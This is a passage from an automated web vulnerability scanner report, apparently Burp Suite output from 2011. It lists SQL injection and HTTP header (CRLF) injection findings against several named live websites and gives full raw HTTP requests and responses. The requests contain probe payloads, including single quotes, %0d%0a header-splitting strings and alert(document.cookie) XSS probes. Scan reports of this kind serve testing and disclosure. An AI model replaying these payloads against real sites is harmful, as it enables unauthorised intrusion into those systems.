Content-Type: text/html
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>37711 - DALLAS</title>
<meta name="description" content="Resu
...[SNIP]...
<p>Microsoft OLE DB Provider for ODBC Drivers</font>
...[SNIP]...

1.7. http://www.bizfind.us/cat/44/1/37711/dallas.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bizfind.us
Path:   /cat/44/1/37711/dallas.aspx

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /cat/44'/1/37711/dallas.aspx HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQQABTDA=AEMEPKABKNLGLDHJGGFBJOHM; __utmz=252525594.1298901533.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; __utma=252525594.1551423665.1298901533.1298901533.1298901533.1; __utmc=252525594; __utmb=252525594.2.10.1298901533

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 28 Feb 2011 14:00:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 1469
Content-Type: text/html
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>DALLAS popular categories</title>
<meta name="description" co
...[SNIP]...
<p>Microsoft OLE DB Provider for ODBC Drivers</font>
...[SNIP]...

1.8. http://www.bizfind.us/cat/44/1/37711/dallas.aspx [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bizfind.us
Path:   /cat/44/1/37711/dallas.aspx

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 4, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /cat/44/1/37711'/dallas.aspx HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQQABTDA=AEMEPKABKNLGLDHJGGFBJOHM; __utmz=252525594.1298901533.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; __utma=252525594.1551423665.1298901533.1298901533.1298901533.1; __utmc=252525594; __utmb=252525594.2.10.1298901533

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 28 Feb 2011 14:01:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 5168
Content-Type: text/html
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>DALLAS popular categories</title>
<meta name="description" co
...[SNIP]...
<p>Microsoft OLE DB Provider for ODBC Drivers</font>
...[SNIP]...

1.9. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /xss-cross-site-scripting.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /xss-cross-site-scripting.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 171

Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''',now())' at line 1

Request 2

GET /xss-cross-site-scripting.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:50 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=60iqmo26d620vrg3i0e6il6a66; path=/
Connection: close
Content-Type: text/html
Content-Length: 22289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...

1.10. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /xss-cross-site-scripting.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /xss-cross-site-scripting.html?1'=1 HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=mnmaj0jl5aopvjvc4nqtmgke36; path=/
Connection: close
Content-Type: text/html
Content-Length: 7658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
</strong>
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and link1.deleted = 0 and link2.deleted = 0 and link_cache.deleted = 0' at line 1

Request 2

GET /xss-cross-site-scripting.html?1''=1 HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:45 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=49tvjj99opblsv0aaq49qqbps4; path=/
Connection: close
Content-Type: text/html
Content-Length: 21434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...

1.11. http://xhtml.co.il/he/page-700/jQuery [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://xhtml.co.il
Path:   /he/page-700/jQuery

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /he/page-700'/jQuery HTTP/1.1
Host: xhtml.co.il
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:40:12 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.9
Pragma: public
Cache-Control: maxage=5184000
Expires: Fri, 29 Apr 2011 13:40:12 GMT
Set-Cookie: PHPSESSID=f0d4e6f19f2bf2742863c131bd5fcd52; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 172

<!DOCTYPE html>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 1' at line 1

1.12. http://xhtml.co.il/ru/page-1013/jQuery.browser [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://xhtml.co.il
Path:   /ru/page-1013/jQuery.browser

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ru/page-1013'/jQuery.browser HTTP/1.1
Host: xhtml.co.il
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:40:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.9
Pragma: public
Cache-Control: maxage=5184000
Expires: Fri, 29 Apr 2011 13:40:09 GMT
Set-Cookie: PHPSESSID=2013e9889d55d51245d67f99fafde02e; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 172

<!DOCTYPE html>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 1' at line 1

2. HTTP header injection
There are 48 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.



2.1. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cf4cf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jlp/csozne/10/50552781/_from=cf4cf

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 87673%0d%0a7e8e4ed489b was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /jlp/87673%0d%0a7e8e4ed489b/10/50552781/_from=cf4cf HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://zones.computerworld.com/ncircle/registration.php?from=cf4cf%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8127f6b53d2&src=csozne&tab=1&item=5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Svr=svr.regwa2; regid=-105b800c:12e634a5162:-1251.90

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 28 Feb 2011 14:18:18 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=87673
7e8e4ed489b
&Source_BC=10&Script=/LP/50552781/reg&_from=cf4cf
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 440

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

2.2. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cf4cf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jlp/csozne/10/50552781/_from=cf4cf

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload ae914%0d%0a68002f8ad7d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /jlp/csozne/ae914%0d%0a68002f8ad7d/50552781/_from=cf4cf HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://zones.computerworld.com/ncircle/registration.php?from=cf4cf%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8127f6b53d2&src=csozne&tab=1&item=5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Svr=svr.regwa2; regid=-105b800c:12e634a5162:-1251.90

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 28 Feb 2011 14:18:19 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=csozne&Source_BC=ae914
68002f8ad7d
&Script=/LP/50552781/reg&_from=cf4cf
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 444

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

2.3. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cf4cf [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jlp/csozne/10/50552781/_from=cf4cf

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 2063a%0d%0a72bc462d3d1 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /jlp/csozne/10/2063a%0d%0a72bc462d3d1/_from=cf4cf HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://zones.computerworld.com/ncircle/registration.php?from=cf4cf%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8127f6b53d2&src=csozne&tab=1&item=5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Svr=svr.regwa2; regid=-105b800c:12e634a5162:-1251.90

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 28 Feb 2011 14:18:19 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=csozne&Source_BC=10&Script=/LP/2063a
72bc462d3d1
/reg&_from=cf4cf
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 438

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

2.4. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cso [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jlp/csozne/10/50552781/_from=cso

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d74bb%0d%0af5a30db6a7 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /jlp/d74bb%0d%0af5a30db6a7/10/50552781/_from=cso HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://zones.computerworld.com/ncircle/registration.php?from=cso&src=csozne&tab=1&item=5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 28 Feb 2011 12:44:46 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=d74bb
f5a30db6a7
&Source_BC=10&Script=/LP/50552781/reg&_from=cso
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 437

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

2.5. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cso [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jlp/csozne/10/50552781/_from=cso

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 93f1c%0d%0a588c3c380c9 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /jlp/csozne/93f1c%0d%0a588c3c380c9/50552781/_from=cso HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://zones.computerworld.com/ncircle/registration.php?from=cso&src=csozne&tab=1&item=5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 28 Feb 2011 12:44:47 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=csozne&Source_BC=93f1c
588c3c380c9
&Script=/LP/50552781/reg&_from=cso
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 442

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

2.6. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cso [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jlp/csozne/10/50552781/_from=cso

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 8af77%0d%0a8e0599031ac was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /jlp/csozne/10/8af77%0d%0a8e0599031ac/_from=cso HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://zones.computerworld.com/ncircle/registration.php?from=cso&src=csozne&tab=1&item=5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 28 Feb 2011 12:44:47 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=csozne&Source_BC=10&Script=/LP/8af77
8e0599031ac
/reg&_from=cso
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 436

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

2.7. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cso6566b' [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jlp/csozne/10/50552781/_from=cso6566b'

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 83165%0d%0a1558ea8fdec was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /jlp/83165%0d%0a1558ea8fdec/10/50552781/_from=cso6566b';alert(1)//04743b660f0 HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://zones.computerworld.com/ncircle/registration.php?from=cso6566b'%3balert(1)//04743b660f0&src=csozne&tab=1&item=5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: regid=-105b800c:12e634a5162:-1251.90; Svr=svr.regwa2

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 28 Feb 2011 14:18:29 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=83165
1558ea8fdec
&Source_BC=10&Script=/LP/50552781/reg&_from=cso6566b';alert(1)//04743b660f0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 466

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

2.8. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cso6566b' [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jlp/csozne/10/50552781/_from=cso6566b'

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload e8db0%0d%0a7561719fcc6 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /jlp/csozne/e8db0%0d%0a7561719fcc6/50552781/_from=cso6566b';alert(1)//04743b660f0 HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://zones.computerworld.com/ncircle/registration.php?from=cso6566b'%3balert(1)//04743b660f0&src=csozne&tab=1&item=5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: regid=-105b800c:12e634a5162:-1251.90; Svr=svr.regwa2

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 28 Feb 2011 14:18:30 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=csozne&Source_BC=e8db0
7561719fcc6
&Script=/LP/50552781/reg&_from=cso6566b';alert(1)//04743b660f0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 470

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

2.9. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cso6566b' [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jlp/csozne/10/50552781/_from=cso6566b'

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 3a18b%0d%0af41f723f100 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /jlp/csozne/10/3a18b%0d%0af41f723f100/_from=cso6566b';alert(1)//04743b660f0 HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://zones.computerworld.com/ncircle/registration.php?from=cso6566b'%3balert(1)//04743b660f0&src=csozne&tab=1&item=5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: regid=-105b800c:12e634a5162:-1251.90; Svr=svr.regwa2

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 28 Feb 2011 14:18:31 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=csozne&Source_BC=10&Script=/LP/3a18b
f41f723f100
/reg&_from=cso6566b';alert(1)//04743b660f0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 464

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

2.10. http://www.accelacomm.com/jlp/csoznee4778' [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jlp/csoznee4778'

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 3a711%0d%0af5e77a50fc3 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /jlp/3a711%0d%0af5e77a50fc3;alert(1)//c8ec899850f/10/50552781/_from=cso HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://zones.computerworld.com/ncircle/registration.php?from=cso&src=csoznee4778'%3balert(1)//c8ec899850f&tab=1&item=5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
